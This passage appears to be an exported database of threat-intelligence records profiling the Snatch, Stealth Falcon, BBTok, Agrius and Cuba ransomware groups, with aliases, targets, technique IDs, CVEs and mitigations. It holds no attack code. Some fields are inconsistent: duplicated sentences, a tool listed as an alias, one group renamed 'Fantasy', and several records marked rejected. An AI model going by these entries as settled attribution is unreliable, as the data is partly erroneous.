  "raw_serialized_analysis": "{\"threat_actor\": \"Snatch\", \"country_of_origin\": \"RU\", \"attack_mitigations\": \"Secure and closely monitor Remote Desktop Protocol (RDP), Maintain offline backups of data, Enable and enforce phishing-resistant multifactor authentication (MFA), The FBI and CISA recommend organizations implement the mitigations to improve their cybersecurity posture. These include auditing remote access tools,  reviewing logs for execution of remote access software,  using security software to detect instances of remote access software being loaded only in memory,  and requiring authorized remote access solutions to be used only from within your network over approved remote access solutions,  such as VPNs or VDIs., Auditing remote access tools,  requiring authorized remote access solutions to be used only from within your network over approved remote access solutions,  such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).,  and requiring authorized remote access solutions to be used only from within the network over approved remote access solutions.\", \"attack_consequences\": \"Data exfiltration, Double extortion, Disruption of service,  data encryption,  and inhibition of system recovery.,  inhibition of system recovery.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"First appearing in 2018,  Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Snatch threat actors have targeted a wide range of critical infrastructure sectors and conduct ransomware operations involving data exfiltration and double extortion.,  Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB),  Food and Agriculture,  and Information Technology sectors., Snatch threat actors are known for their ransomware attacks. They use various techniques such as gathering victim's network information,  acquiring infrastructure from VPS service providers,  using compromised user credentials,  exploiting weaknesses in RDP,  and using batch files during ransomware execution and data discovery. They also modify Windows Registry keys to aid in persistence and execution and use brute force to obtain administrator credentials for a victim\\u2019s network., Snatch threat actors are known for their ransomware attacks. They use various techniques such as gathering information about the victim's networks,  renting Virtual Private Servers (VPSs),  and using batch files during ransomware execution and data discovery. They also modify Windows Registry keys,  disable system\\u2019s antivirus program,  and delete all volume shadow copies from a victim\\u2019s filesystem to inhibit system recovery.,  and using batch files during ransomware execution and data discovery. They also modify Windows Registry keys to aid in persistence and execution\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"target_industry_sectors\": [\"defense\", \"agriculture\", \"technology\"], \"threat_actor_capabilities\": [\"T1562.009\", \"T1133\", \"T1110.001\", \"T1078\", \"T1078.002\", \"T1071.001\", \"T1583.003\", \"T1590\", \"T1021.001\", \"T1005\", \"TA0010\", \"T1486\", \"T1562.001\", \"T1036\", \"T1012\", \"T1112\", \"T1569.002\", \"T1057\", \"T1059.003\", \"T1490\", \"T1070.004\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [\"Team Truniger\"], \"vulnerabilities\": [], \"sources\": [\"Federal Bureau of Investigation (FBI)\", \"Cybersecurity and Infrastructure Security Agency (CISA)\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Snatch\"], \"aliases\": [\"Team Truniger\"], \"country_of_origin\": [\"RU\"], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"First appearing in 2018\", \" Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Snatch threat actors have targeted a wide range of critical infrastructure sectors and conduct ransomware operations involving data exfiltration and double extortion.\", \" Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB)\", \" Food and Agriculture\", \" and Information Technology sectors.\", \"Snatch threat actors are known for their ransomware attacks. They use various techniques such as gathering victim's network information\", \" acquiring infrastructure from VPS service providers\", \" using compromised user credentials\", \" exploiting weaknesses in RDP\", \" and using batch files during ransomware execution and data discovery. They also modify Windows Registry keys to aid in persistence and execution and use brute force to obtain administrator credentials for a victim\\u2019s network.\", \"Snatch threat actors are known for their ransomware attacks. They use various techniques such as gathering information about the victim's networks\", \" renting Virtual Private Servers (VPSs)\", \" and using batch files during ransomware execution and data discovery. They also modify Windows Registry keys\", \" disable system\\u2019s antivirus program\", \" and delete all volume shadow copies from a victim\\u2019s filesystem to inhibit system recovery.\", \" and using batch files during ransomware execution and data discovery. They also modify Windows Registry keys to aid in persistence and execution\"], \"target_populations\": [], \"target_industry_sectors\": [\"defense\", \"agriculture\", \"technology\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"threat_actor_capabilities\": [\"T1562.009\", \"T1133\", \"T1110.001\", \"T1078\", \"T1078.002\", \"T1071.001\", \"T1583.003\", \"T1590\", \"T1021.001\", \"T1005\", \"TA0010\", \"T1486\", \"T1562.001\", \"T1036\", \"T1012\", \"T1112\", \"T1569.002\", \"T1057\", \"T1059.003\", \"T1490\", \"T1070.004\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [\"Secure and closely monitor Remote Desktop Protocol (RDP)\", \"Maintain offline backups of data\", \"Enable and enforce phishing-resistant multifactor authentication (MFA)\", \"The FBI and CISA recommend organizations implement the mitigations to improve their cybersecurity posture. These include auditing remote access tools\", \" reviewing logs for execution of remote access software\", \" using security software to detect instances of remote access software being loaded only in memory\", \" and requiring authorized remote access solutions to be used only from within your network over approved remote access solutions\", \" such as VPNs or VDIs.\", \"Auditing remote access tools\", \" requiring authorized remote access solutions to be used only from within your network over approved remote access solutions\", \" such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).\", \" and requiring authorized remote access solutions to be used only from within the network over approved remote access solutions.\"], \"attack_consequences\": [\"Data exfiltration\", \"Double extortion\", \"Disruption of service\", \" data encryption\", \" and inhibition of system recovery.\", \" inhibition of system recovery.\"], \"vulnerabilities\": [], \"sources\": [\"Federal Bureau of Investigation (FBI)\", \"Cybersecurity and Infrastructure Security Agency (CISA)\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-26T22:09:45.572Z"
  },
  "approval_message": "",
  "change_log": [],
  "threat_actor": "Snatch"
},
{
  "_id": {
    "$oid": "6512f9a67fbbd0c5aedf372e"
  },
  "report": {
    "$oid": "6512f96cc12f2c67e0da88aa"
  },
  "threat_actor_overview": "Stealth Falcon,  also known as FruityArmor,  is a threat actor known for its cyber espionage campaigns. It was first exposed in 2016 and has been linked to a set of targeted spyware attacks in the Middle East. The group has been linked to the zero-day exploitation of Windows flaws and has been noted for using more zero-days than any other group from 2016 to 2019. The group's latest addition to its arsenal is a backdoor named Deadglyph.,  is a threat actor known for its cyber espionage campaigns. It was first exposed in 2016 and has been linked to a set of targeted spyware attacks in the Middle East. The group has been linked to the zero-day exploitation of Windows flaws and has been noted for using more zero-days than any other group from 2016 to 2019. The group's latest addition to its arsenal is an advanced backdoor dubbed Deadglyph.",
  "aliases": [
    "FruityArmor"
  ],
  "sources": [
    "The Hacker News"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Espionage"
  ],
  "threat_actor_intent": [
    "Espionage"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "AE"
  ],
  "target_regions": [
    "middle-east"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--45b3f739-670b-4565-ab2b-ad9a20cb35cb",
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [
    "CVE-2018-8611",
    "CVE-2019-0797"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Stealth Falcon\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Stealth Falcon,  also known as FruityArmor,  is a threat actor known for its cyber espionage campaigns. It was first exposed in 2016 and has been linked to a set of targeted spyware attacks in the Middle East. The group has been linked to the zero-day exploitation of Windows flaws and has been noted for using more zero-days than any other group from 2016 to 2019. The group's latest addition to its arsenal is a backdoor named Deadglyph.,  is a threat actor known for its cyber espionage campaigns. It was first exposed in 2016 and has been linked to a set of targeted spyware attacks in the Middle East. The group has been linked to the zero-day exploitation of Windows flaws and has been noted for using more zero-days than any other group from 2016 to 2019. The group's latest addition to its arsenal is an advanced backdoor dubbed Deadglyph.\", \"target_countries\": [\"AE\"], \"target_regions\": [\"middle-east\"], \"target_populations\": [], \"threat_actor_intent\": [\"Espionage\"], \"target_industry_sectors\": [\"government-public-services\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"FruityArmor\"], \"vulnerabilities\": [\"CVE-2018-8611\", \"CVE-2019-0797\"], \"sources\": [\"The Hacker News\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Stealth Falcon\"], \"aliases\": [\"FruityArmor\"], \"country_of_origin\": [], \"target_countries\": [\"AE\"], \"target_regions\": [\"middle-east\"], \"threat_actor_overview\": [\"Stealth Falcon\", \" also known as FruityArmor\", \" is a threat actor known for its cyber espionage campaigns. It was first exposed in 2016 and has been linked to a set of targeted spyware attacks in the Middle East. The group has been linked to the zero-day exploitation of Windows flaws and has been noted for using more zero-days than any other group from 2016 to 2019. The group's latest addition to its arsenal is a backdoor named Deadglyph.\", \" is a threat actor known for its cyber espionage campaigns. It was first exposed in 2016 and has been linked to a set of targeted spyware attacks in the Middle East. The group has been linked to the zero-day exploitation of Windows flaws and has been noted for using more zero-days than any other group from 2016 to 2019. The group's latest addition to its arsenal is an advanced backdoor dubbed Deadglyph.\"], \"target_populations\": [], \"target_industry_sectors\": [\"government-public-services\"], \"threat_actor_intent\": [\"Espionage\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [\"CVE-2018-8611\", \"CVE-2019-0797\"], \"sources\": [\"The Hacker News\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-27T20:48:15.588Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "6512f9d6c12f2c67e0da88ab"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-26T15:33:42.565Z"
      },
      "changes": [
        {
          "field": "target_industry_sectors",
          "previous_value": [
            {
              "id": "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
              "name": "government-public-services",
              "description": null,
              "created": "2023-08-24 13:57:04.399000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ],
          "updated_value": [
            {
              "id": "x-industry-sector--45b3f739-670b-4565-ab2b-ad9a20cb35cb",
              "name": "communications",
              "description": null,
              "created": "2023-08-24 13:57:04.368000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
              "name": "government-public-services",
              "description": null,
              "created": "2023-08-24 13:57:04.399000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ]
        }
      ]
    }
  ],
  "threat_actor": "Stealth Falcon"
},
{
  "_id": {
    "$oid": "6515a3d0c819af51ad7ec247"
  },
  "report": {
    "$oid": "6515a39f8749acb9f47faf85"
  },
  "threat_actor_overview": "BBTok is a banking Trojan that has been active since 2020,  primarily targeting users in Brazil and Mexico. It uses a variety of techniques to evade detection,  including the use of Living off the Land Binaries (LOLBins) and multi-layered geo-fencing. The malware is capable of replicating the interfaces of over 40 major banks in Mexico and Brazil,  tricking victims into entering their 2FA codes or payment card numbers., BBTok operators are active threat actors who have been operating since 2020. They primarily target users in Brazil and Mexico,  using a new variant of the BBTok banker. Their techniques have evolved significantly over time,  adding additional layers of obfuscation and downloaders,  resulting in low detection rates. They use phishing links to distribute their malware and have a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks,  tricking victims into entering their 2FA code or payment card number.",
  "aliases": [],
  "sources": [
    "Check Point Research"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Financial Theft",
    "Information Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual",
    "organization"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "BR",
    "MX"
  ],
  "target_regions": [
    "latin-america-caribbean"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"BBTok, BBTok operators\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"BBTok is a banking Trojan that has been active since 2020,  primarily targeting users in Brazil and Mexico. It uses a variety of techniques to evade detection,  including the use of Living off the Land Binaries (LOLBins) and multi-layered geo-fencing. The malware is capable of replicating the interfaces of over 40 major banks in Mexico and Brazil,  tricking victims into entering their 2FA codes or payment card numbers., BBTok operators are active threat actors who have been operating since 2020. They primarily target users in Brazil and Mexico,  using a new variant of the BBTok banker. Their techniques have evolved significantly over time,  adding additional layers of obfuscation and downloaders,  resulting in low detection rates. They use phishing links to distribute their malware and have a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks,  tricking victims into entering their 2FA code or payment card number.\", \"target_countries\": [\"BR\", \"MX\"], \"target_regions\": [\"latin-america-caribbean\"], \"target_populations\": [], \"threat_actor_intent\": [\"Financial Theft\", \"Information Theft\"], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\", \"organization\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Check Point Research\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"BBTok\", \"BBTok operators\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"BR\", \"MX\"], \"target_regions\": [\"latin-america-caribbean\"], \"threat_actor_overview\": [\"BBTok is a banking Trojan that has been active since 2020\", \" primarily targeting users in Brazil and Mexico. It uses a variety of techniques to evade detection\", \" including the use of Living off the Land Binaries (LOLBins) and multi-layered geo-fencing. The malware is capable of replicating the interfaces of over 40 major banks in Mexico and Brazil\", \" tricking victims into entering their 2FA codes or payment card numbers.\", \"BBTok operators are active threat actors who have been operating since 2020. They primarily target users in Brazil and Mexico\", \" using a new variant of the BBTok banker. Their techniques have evolved significantly over time\", \" adding additional layers of obfuscation and downloaders\", \" resulting in low detection rates. They use phishing links to distribute their malware and have a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks\", \" tricking victims into entering their 2FA code or payment card number.\"], \"target_populations\": [], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_intent\": [\"Financial Theft\", \"Information Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\", \"organization\"], \"threat_actor_sophistication\": [], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"Check Point Research\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:12:37.593Z"
  },
  "approval_message": "Needs more detail in general.\n",
  "change_log": [],
  "threat_actor": "BBTok, BBTok operators"
},
{
  "_id": {
    "$oid": "6515a42bc819af51ad7ec248"
  },
  "report": {
    "$oid": "6515a4088749acb9f47faf86"
  },
  "threat_actor_overview": "Agrius is a newer Iran-aligned group targeting victims in Israel and the United Arab Emirates since 2020. The group initially deployed a wiper,  Apostle,  disguised as ransomware,  but later modified Apostle into fully fledged ransomware. Agrius exploits known vulnerabilities in internet-facing applications to install webshells,  then conducts internal reconnaissance before moving laterally and then deploying its malicious payloads.",
  "aliases": [],
  "sources": [
    "ESET"
  ],
  "country_of_origin": "IR",
  "threat_actor_motives": [
    "Cyberwarfare",
    "Espionage"
  ],
  "threat_actor_intent": [
    "Disruption of Service",
    "Credential Harvesting",
    "Damage and Destruction"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "IL",
    "ZA",
    "HK"
  ],
  "target_regions": [
    "middle-east",
    "southern-africa",
    "eastern-asia"
  ],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "Wipers are a category of malware aiming to delete data on breached computers,  causing digital destruction and business interruption., Data deletion on breached computers, Disruption of Service, Damage and Destruction",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Agrius APT\", \"country_of_origin\": \"IR\", \"attack_mitigations\": \"The affected software developer realized the problem immediately and pushed clean updates within hours.\", \"attack_consequences\": \"Wipers are a category of malware aiming to delete data on breached computers,  causing digital destruction and business interruption., Data deletion on breached computers, Disruption of Service, Damage and Destruction\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Agrius is a newer Iran-aligned group targeting victims in Israel and the United Arab Emirates since 2020. The group initially deployed a wiper,  Apostle,  disguised as ransomware,  but later modified Apostle into fully fledged ransomware. Agrius exploits known vulnerabilities in internet-facing applications to install webshells,  then conducts internal reconnaissance before moving laterally and then deploying its malicious payloads.\", \"target_countries\": [\"IL\", \"ZA\", \"HK\"], \"target_regions\": [\"middle-east\", \"southern-africa\", \"eastern-asia\"], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\", \"Credential Harvesting\", \"Damage and Destruction\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Cyberwarfare\", \"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"ESET\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Agrius APT\"], \"aliases\": [], \"country_of_origin\": [\"IR\"], \"target_countries\": [\"IL\", \"ZA\", \"HK\"], \"target_regions\": [\"middle-east\", \"southern-africa\", \"eastern-asia\"], \"threat_actor_overview\": [\"Agrius is a newer Iran-aligned group targeting victims in Israel and the United Arab Emirates since 2020. The group initially deployed a wiper\", \" Apostle\", \" disguised as ransomware\", \" but later modified Apostle into fully fledged ransomware. Agrius exploits known vulnerabilities in internet-facing applications to install webshells\", \" then conducts internal reconnaissance before moving laterally and then deploying its malicious payloads.\"], \"target_populations\": [], \"target_industry_sectors\": [\"diamond\"], \"threat_actor_intent\": [\"Disruption of Service\", \"Credential Harvesting\", \"Damage and Destruction\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Cyberwarfare\", \"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [\"The affected software developer realized the problem immediately and pushed clean updates within hours.\"], \"attack_consequences\": [\"Wipers are a category of malware aiming to delete data on breached computers\", \" causing digital destruction and business interruption.\", \"Data deletion on breached computers\", \"Disruption of Service\", \"Damage and Destruction\"], \"vulnerabilities\": [], \"sources\": [\"ESET\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:11:48.474Z"
  },
  "approval_message": "Needs more detail in threat insight and scope of attack. ",
  "change_log": [
    {
      "_id": {
        "$oid": "6515a4cb8749acb9f47faf88"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-28T16:07:39.781Z"
      },
      "changes": [
        {
          "field": "attack_mitigations",
          "previous_value": "The affected software developer realized the problem immediately and pushed clean updates within hours.",
          "updated_value": ""
        }
      ]
    },
    {
      "_id": {
        "$oid": "6515a4b78749acb9f47faf87"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-28T16:07:19.692Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Agrius APT",
          "updated_value": "Fantasy"
        }
      ]
    }
  ],
  "threat_actor": "Fantasy"
},
{
  "_id": {
    "$oid": "651728c1eea4f4ceb6337cfc"
  },
  "report": {
    "$oid": "650b1bb64ef4f40249f09d57"
  },
  "threat_actor_overview": "Agrius is an Iran-aligned threat actor that operates mostly in the Middle-East. The actor has been tied to several ransomware and wiper attacks,  with a major focus on Israeli institutions. The groups affiliation within Iran is not clear,  although recent reports have tied it to the Iranian Ministry of Intelligence and Security (MOIS).",
  "aliases": [
    "BlackShadow"
  ],
  "sources": [],
  "country_of_origin": "IR",
  "threat_actor_motives": [
    "Espionage"
  ],
  "threat_actor_intent": [
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "IL"
  ],
  "target_regions": [
    "middle-east"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Agrius\", \"country_of_origin\": \"IR\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Agrius is an Iran-aligned threat actor that operates mostly in the Middle-East. The actor has been tied to several ransomware and wiper attacks,  with a major focus on Israeli institutions. The groups affiliation within Iran is not clear,  although recent reports have tied it to the Iranian Ministry of Intelligence and Security (MOIS).\", \"target_countries\": [\"IL\"], \"target_regions\": [\"middle-east\"], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\"], \"target_industry_sectors\": [\"education\", \"financial-services\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Cyberwarfare\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"BlackShadow\"], \"vulnerabilities\": [], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Agrius\"], \"aliases\": [\"BlackShadow\"], \"country_of_origin\": [\"IR\"], \"target_countries\": [\"IL\"], \"target_regions\": [\"middle-east\"], \"threat_actor_overview\": [\"Agrius is an Iran-aligned threat actor that operates mostly in the Middle-East. The actor has been tied to several ransomware and wiper attacks\", \" with a major focus on Israeli institutions. The groups affiliation within Iran is not clear\", \" although recent reports have tied it to the Iranian Ministry of Intelligence and Security (MOIS).\"], \"target_populations\": [], \"target_industry_sectors\": [\"education\", \"financial-services\"], \"threat_actor_intent\": [\"Disruption of Service\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Cyberwarfare\", \"Disruption of Service\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": []}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:00:33.144Z"
  },
  "approval_message": "Needs more detail",
  "change_log": [
    {
      "_id": {
        "$oid": "6517294e8ecf1010d6288cdc"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-29T19:45:18.203Z"
      },
      "changes": [
        {
          "field": "threat_actor_motives",
          "previous_value": [
            "Cyberwarfare"
          ],
          "updated_value": [
            "Espionage"
          ]
        }
      ]
    }
  ],
  "threat_actor": "Agrius"
},
{
  "_id": {
    "$oid": "651afb341705d3ff27d6bc2e"
  },
  "report": {
    "$oid": "651afab9c52236be04cc9ea0"
  },
  "threat_actor_overview": "The Cuba ransomware gang,  also known as Tropical Scorpius,  ColdDraw,  Fidel,  and V Is Vendetta,  is a ransomware-as-a-service (RaaS) outfit that primarily targets organizations in the United States,  Canada,  and Europe. The gang uses complex tactics and techniques to penetrate victim networks,  such as exploitation of software vulnerabilities and social engineering. They are known for their attacks on oil companies,  financial services,  government agencies,  and healthcare providers., The Cuba cybercrime gang employs an extensive arsenal of both publicly available and custom-made tools,  which it keeps up to date,  and various techniques and methods including fairly dangerous ones,  such as BYOVD.",
  "aliases": [
    "Tropical Scorpius",
    "ColdDraw",
    "Fidel",
    "Cuba",
    "V Is Vendetta",
    "Burntcigar",
    "Bughatch",
    "Cobalt Strike"
  ],
  "sources": [
    "Kaspersky Incident Response team"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Disruption of Service",
    "Damage and Destruction"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US",
    "CA",
    "EU"
  ],
  "target_regions": [
    "americas",
    "europe"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--bb358902-b786-4067-9de8-75277fe7a71e"
  ],
  "attack_mitigations": "Enable Hypervisor-Protected Code Integrity,  Enable Memory Integrity,  Enable validation of driver digital signatures,  Use the vulnerable driver blocklist.",
  "attack_consequences": "Disruption of Service,  Damage and Destruction",
  "vulnerabilities": [
    "CVE-2021-31207",
    "CVE-2021-34473",
    "CVE-2021-34523",
    "CVE-2021-26855",
    "CVE-2021-26857",
    "CVE-2021-26858",
    "CVE-2021-27065",
    "CVE-2022-26501",
    "CVE-2022-26504",
    "CVE-2022-26500",
    "CVE-2020-1472",
    "CVE-2022-26522",
    "CVE-2022-26523"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Cuba ransomware gang, Cuba cybercrime gang\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Enable Hypervisor-Protected Code Integrity,  Enable Memory Integrity,  Enable validation of driver digital signatures,  Use the vulnerable driver blocklist.\", \"attack_consequences\": \"Disruption of Service,  Damage and Destruction\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Cuba ransomware gang,  also known as Tropical Scorpius,  ColdDraw,  Fidel,  and V Is Vendetta,  is a ransomware-as-a-service (RaaS) outfit that primarily targets organizations in the United States,  Canada,  and Europe. The gang uses complex tactics and techniques to penetrate victim networks,  such as exploitation of software vulnerabilities and social engineering. They are known for their attacks on oil companies,  financial services,  government agencies,  and healthcare providers., The Cuba cybercrime gang employs an extensive arsenal of both publicly available and custom-made tools,  which it keeps up to date,  and various techniques and methods including fairly dangerous ones,  such as BYOVD.\", \"target_countries\": [\"US\", \"CA\", \"EU\"], \"target_regions\": [\"americas\", \"europe\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\"], \"target_industry_sectors\": [\"financial-services\", \"government-public-services\", \"healthcare\", \"technology\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [\"Tropical Scorpius\", \"ColdDraw\", \"Fidel\", \"Cuba\", \"V Is Vendetta\", \"Burntcigar\", \"Bughatch\", \"Cobalt Strike\"], \"vulnerabilities\": [\"CVE-2021-31207\", \"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-26855\", \"CVE-2021-26857\", \"CVE-2021-26858\", \"CVE-2021-27065\", \"CVE-2022-26501\", \"CVE-2022-26504\", \"CVE-2022-26500\", \"CVE-2020-1472\", \"CVE-2022-26522\", \"CVE-2022-26523\"], \"sources\": [\"Kaspersky Incident Response team\"]}",
